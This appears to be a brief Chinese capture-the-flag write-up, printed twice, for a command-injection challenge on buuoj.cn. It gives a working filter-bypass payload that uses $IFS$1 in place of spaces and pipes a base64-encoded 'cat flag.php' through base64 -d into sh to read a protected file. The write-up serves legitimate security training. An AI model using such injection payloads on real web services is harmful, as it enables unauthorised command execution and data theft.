复现环境:buuoj.cn
开题发现是命令执行的题
ls查看下
使用cat发现空格被过滤了,这里用$IFS$1来代替空格,读取flag.php也被过滤了,这里读取index.php
根据过滤来构建payload
Y2F0IGZsYWcucGhw 是cat flag.php的base64编码
echo$IFS$1Y2F0IGZsYWcucGhw|base64$IFS$1-d|sh
我只做了这个解法,但这题还有其他的解法。
复现环境:buuoj.cn
开题发现是命令执行的题
ls查看下
使用cat发现空格被过滤了,这里用$IFS$1来代替空格,读取flag.php也被过滤了,这里读取index.php
根据过滤来构建payload
Y2F0IGZsYWcucGhw 是cat flag.php的base64编码
echo$IFS$1Y2F0IGZsYWcucGhw|base64$IFS$1-d|sh
我只做了这个解法,但这题还有其他的解法。